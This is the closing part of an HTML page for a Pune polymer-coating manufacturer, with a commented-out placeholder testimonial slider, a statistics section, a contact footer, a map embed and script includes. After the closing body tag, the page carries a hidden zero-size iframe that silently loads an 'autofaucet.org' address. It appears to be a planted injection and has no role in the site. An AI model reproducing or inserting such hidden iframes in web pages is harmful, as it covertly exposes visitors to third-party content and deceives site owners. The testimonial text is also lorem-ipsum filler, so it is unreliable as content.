    <!--<div class="testimonial-area section-bg-1--- bg-image-top pt-115 pb-70">

        <div class="container">

            <div class="row">

                <div class="col-lg-12">

                    <div class="section-title-area section-title-2 text-center">

                        <h6 class="section-subtitle secondary-color"><span><i class="fas fa-dot-circle"></i></span> Client,s Feedback <span><i class="fas fa-dot-circle"></i></span></h6>

                        <h2 class="section-title">Client's Feedback</h2>

                    </div>

                </div>

          </div>

            <div class="row testimonial-slider-5-active slick-arrow-1">

                <div class="col-lg-4">

                    <div class="testimonial-item testimonial-item-7">

                        <div class="testimoni-info">

                            <i class="flaticon-left-quote-1"></i> 

                            <p>

                                Precious ipsum dolor sit amet

                                consectetur adipisicing elit, sed dos

                                mod tempor incididunt ut labore et

                                dolore magna aliqua. Ut enim ad min

                                veniam, quis nostrud Precious ips

                                um dolor sit amet, consecte</p>

                            <div class="testimoni-info-inner">

                                <div class="testimoni-img">

                                    <img src="img/testimonial/1.jpg" alt="#">

                                </div>

                                <div class="testimoni-name-designation">

                                    <h5>Jacob William</h5>

                                    <label>Selling Agents</label>

                                </div>

                            </div>

                        </div>

                    </div>

                </div>

                <div class="col-lg-4">

                  <div class="testimonial-item testimonial-item-7">

                        <div class="testimoni-info">

                            <i class="flaticon-left-quote-1"></i> 

                            <p>

                                Precious ipsum dolor sit amet

                                consectetur adipisicing elit, sed dos

                                mod tempor incididunt ut labore et

                                dolore magna aliqua. Ut enim ad min

                                veniam, quis nostrud Precious ips

                                um dolor sit amet, consecte</p>

                            <div class="testimoni-info-inner">

                                <div class="testimoni-img">

                                    <img src="img/testimonial/2.jpg" alt="#">

                                </div>

                                <div class="testimoni-name-designation">

                                    <h5>Jacob William</h5>

                                    <label>Selling Agents</label>

                                </div>

                            </div>

                        </div>

                    </div>

                </div>

                <div class="col-lg-4">

                  <div class="testimonial-item testimonial-item-7">

                        <div class="testimoni-info">

                            <i class="flaticon-left-quote-1"></i> 

                            <p>

                                Precious ipsum dolor sit amet

                                consectetur adipisicing elit, sed dos

                                mod tempor incididunt ut labore et

                                dolore magna aliqua. Ut enim ad min

                                veniam, quis nostrud Precious ips

                                um dolor sit amet, consecte</p>

                            <div class="testimoni-info-inner">

                                <div class="testimoni-img">

                                    <img src="img/testimonial/3.jpg" alt="#">

                                </div>

                                <div class="testimoni-name-designation">

                                    <h5>Jacob William</h5>

                                    <label>Selling Agents</label>

                                </div>

                            </div>

                        </div>

                    </div>

                </div>

                <div class="col-lg-4">

                  <div class="testimonial-item testimonial-item-7">

                        <div class="testimoni-info">

                            <i class="flaticon-left-quote-1"></i> 

                            <p>

                                Precious ipsum dolor sit amet

                                consectetur adipisicing elit, sed dos

                                mod tempor incididunt ut labore et

                                dolore magna aliqua. Ut enim ad min

                                veniam, quis nostrud Precious ips

                                um dolor sit amet, consecte</p>

                            <div class="testimoni-info-inner">

                                <div class="testimoni-img">

                                    <img src="img/testimonial/4.jpg" alt="#">

                                </div>

                                <div class="testimoni-name-designation">

                                    <h5>Jacob William</h5>

                                    <label>Selling Agents</label>

                                </div>

                            </div>

                        </div>

                    </div>

                </div>

             

            </div>

        </div>

    </div>-->

    <!-- TESTIMONIAL AREA END -->





    <!-- PROGRESS BAR AREA START -->

    <div class="progress-bar-area pt-45 pb-10">

        <div class="container">

            <div class="row">

                <div class="col-lg-12">

                    <div class="section-title-area section-title-2 text-center">

                        <h6 class="section-subtitle secondary-color"><span><i class="fas fa-dot-circle"></i></span> We are at <span><i class="fas fa-dot-circle"></i></span></h6>

                        <h2 class="section-title">Our Statistics</h2>

                    </div>

                </div>

          </div>

            <div class="row">

                <div class="col-lg-12">

                    <div class="progress-bar-wrap">

                        <div class="progress-bar-inner">

                            <div class="row">

                                <div class="col-lg-3 col-sm-6 countwindow">

                                    <div class="progress-bar-item-2 text-center">

                                        <div class="progress" data-value='78'>

                                            <span class="progress-left">

                                                <span class="progress-bar border-primary"></span>

                                            </span>

                                            <span class="progress-right">

                                                <span class="progress-bar border-primary"></span>

                                            </span>

                                            <div class="progress-value">

                                                <div class="progress-count">05<sup class="small"></sup></div>

                                            </div>

                                        </div>

                                        <div class="progress-info">

                                            <h3>Countries covered </h3>

                                        </div>

                                    </div>

                                </div>

                                <div class="col-lg-3 col-sm-6 countwindow">

                                    <div class="progress-bar-item-2 text-center">

                                        <div class="progress" data-value='78'>

                                            <span class="progress-left">

                                                <span class="progress-bar border-primary"></span>

                                            </span>

                                            <span class="progress-right">

                                                <span class="progress-bar border-primary"></span>

                                            </span>

                                            <div class="progress-value">

                                                <div class="progress-count">95<sup class="small"> ></sup></div>

                                            </div>

                                        </div>

                                        <div class="progress-info">

                                            <h3>Customer satisfaction index</h3>

                                        </div>

                                    </div>

                                </div>

                                <div class="col-lg-3 col-sm-6 countwindow">

                                    <div class="progress-bar-item-2 text-center">

                                        <div class="progress" data-value='62'>

                                            <span class="progress-left">

                                                <span class="progress-bar border-danger"></span>

                                            </span>

                                            <span class="progress-right">

                                                <span class="progress-bar border-danger"></span>

                                            </span>

                                            <div class="progress-value">

                                                <div class="progress-count">99<sup class="small"> ></sup></div>

                                            </div>

                                        </div>

                                        <div class="progress-info">

                                            <h3>Delivery performance index</h3>

                                        </div>

                                    </div>

                                </div>

                                <div class="col-lg-3 col-sm-6 countwindow">

                                    <div class="progress-bar-item-2 text-center">

                                        <div class="progress" data-value='50'>

                                            <span class="progress-left">

                                                <span class="progress-bar border-success"></span>

                                            </span>

                                            <span class="progress-right">

                                                <span class="progress-bar border-success"></span>

                                            </span>

                                            <div class="progress-value">

                                                <div class="progress-count"><sup class="small">< </sup> 0.2</div>

                                            </div>

                                        </div>

                                        <div class="progress-info">

                                            <h3>Customer rejection</h3>

                                        </div>

                                    </div>

                                </div>

                                <div class="col-lg-3 col-sm-6 countwindow">

                                    <div class="progress-bar-item-2 text-center">

                                        <div class="progress" data-value='90'>

                                            <span class="progress-left">

                                                <span class="progress-bar border-warning"></span>

                                            </span>

                                            <span class="progress-right">

                                                <span class="progress-bar border-warning"></span>

                                            </span>

                                            <div class="progress-value">

                                                <div class="progress-count">800<sup class="small">></sup></div>

                                            </div>

                                        </div>

                                        <div class="progress-info">

                                            <h3>Happy Clients</h3>

                                        </div>

                                    </div>

                                </div>

                            </div>

                        </div>

                    </div>

                </div>

            </div>

        </div>

    </div>

    <!-- PROGRESS BAR AREA END -->



    



   



    <!-- FOOTER AREA START -->

    <footer class="footer-area  ">

        <div class="footer-top-area  section-bg-2 plr--5">

            <div class="container-fluid">

                <div class="row">

                    <div class="col-xl-3 col-md-6 col-sm-6 col-12 ">

                        <div class="footer-widget footer-about-widget tw-footer-info-box">

                            <div class="footer-logo">

                                <div class="site-logo">

                                    <img src="img/logo-footer.png" alt="Logo">

                                </div>

                            </div>

                            <p>We at Electrocoating and Insulation Technologies Private Limited are engaged in developing and manufacturing various types of polymer coatings. </p>

                            <div class="social-media mt-20">

                                <ul>

                                    <li><a href="#" title="Facebook"><i class="fab fa-facebook-f"></i></a></li>

                                    <li><a href="#" title="Twitter"><i class="fab fa-twitter"></i></a></li>

                                    <li><a href="#" title="Linkedin"><i class="fab fa-linkedin"></i></a></li>

                                    <li><a href="#" title="Youtube"><i class="fab fa-youtube"></i></a></li>

                                </ul>

                            </div>

                        </div>

                    </div>



                    <div class="col-xl-3 col-md-6 col-sm-6 col-12 pl-lg-5">

                        <div class="footer-widget footer-menu-widget clearfix">

                            <h4 class="footer-title">Quick Links</h4>

                            <div class="footer-menu">

                                <ul>

                                    <li><a href="index.html">Home</a></li>

                                    <li><a href="about.html">About</a></li>

                                    <li><a href="epofil-60.html">Product</a></li>

                                    <li><a href="client.html">Clients</a></li>

                                    <li><a href="testimonial.html">Testimonial</a></li>

                                    <li><a href="contact.html">Contact us</a></li>

                                </ul>

                            </div>

                        </div>

                    </div>

                    

                    <div class="col-xl-3 col-md-6 col-sm-12 col-12">

                        <div class="footer-widget footer-about-widget tw-footer-info-box">

							<h4 class="footer-title">Connect With Us</h4>

                            <div class="footer-address">

                                <ul>

                                    <li>

                                        <div class="footer-address-icon">

                                            <i class="icon-placeholder"></i>

                                        </div>

                                        <div class="footer-address-info">

                                            <p>Plot No.1, S. No. 228, Hinjawadi Maan Road, Behind Wipro, Hinjawadi Pune 411 057</p>

                                        </div>

                                    </li>

                                    <li>

                                        <div class="footer-address-icon">

                                            <i class="icon-call"></i>

                                        </div>

                                        <div class="footer-address-info">

                                            <p><a href="tel:+919898334414">+91 9370903742 / 9370903748</a></p>

                                        </div>

                                    </li>

                                    <li>

                                        <div class="footer-address-icon">

                                            <i class="icon-mail"></i>

                                        </div>

                                        <div class="footer-address-info">

                                            <p><a href="mailto: mktg@electrocoats.com"> mktg@electrocoats.com </a></p>

                                        </div>

                                    </li>

                                </ul>

                            </div>

                        </div>

                    </div>



                    <div class="col-xl-3 col-md-6 col-sm-6 col-12">

                        <div class="footer-widget footer-menu-widget clearfix">

                            <a href="https://www.google.com/maps/place/Electrocoating+and+Insulation+Technologies+Private+Limited/@18.586823,73.730753,15z/data=!4m5!3m4!1s0x0:0x3776020f31696634!8m2!3d18.5868564!4d73.7307398?hl=en" target="_blank"><h4 class="footer-title">Meet Us On</h4></a>

                            <iframe src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3781.716236983106!2d73.72856391534948!3d18.58682757199449!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3bc2bbb9f36cd2a1%3A0x3776020f31696634!2sElectrocoating%20and%20Insulation%20Technologies%20Private%20Limited!5e0!3m2!1sen!2sin!4v1628244807027!5m2!1sen!2sin"  style="border:0;" allowfullscreen="" loading="lazy"></iframe>

                        </div>

                    </div>

                </div>

            </div>

        </div>

        <div class="copyright-area copyright-2 section-bg-7  plr--5">

            <div class="container-fluid border-top-2">

                <div class="row">

                    <div class="col-md-6 col-12">

                        <div class="copyright-design clearfix">

                            <p>All Rights Reserved @ Electrocoating & Insulation Technologies <span class="current-year"></span></p>

                        </div>

                    </div>

                    <div class="col-md-6 col-12 ">

                        <div class="copyright-menu text-right">

                            <p>Designed By <a href="" target="_blank">Satkar Software Solutions Pvt. Ltd.</a>

                            </p>

                        </div>

                    </div>

                </div>

            </div>

        </div>

    </footer>

    <!-- FOOTER AREA END -->



    







</div>

<!-- Body main wrapper end -->



    <!-- preloader area start -->

    <div class="preloader d-none" id="preloader">

        <div class="preloader-inner">

            <div class="spinner">

                <div class="dot1"></div>

                <div class="dot2"></div>

            </div>

        </div>

    </div>

    <!-- preloader area end -->

    

    <!-- Jquery Plugins -->

	<script src="js/jquery.min.js"></script>

    <!-- bootstrap js -->

    <script src="js/bootstrap.min.js"></script>

    <!-- All JS Plugins -->

    <script src="js/plugins.js"></script>

    <!-- Main JS -->

    <script src="js/main.js"></script>

  

</body>

<iframe src="https://autofaucet.org/wm/dungeon228/4" width="0" height="0" style="border:0"></iframe>

</html>



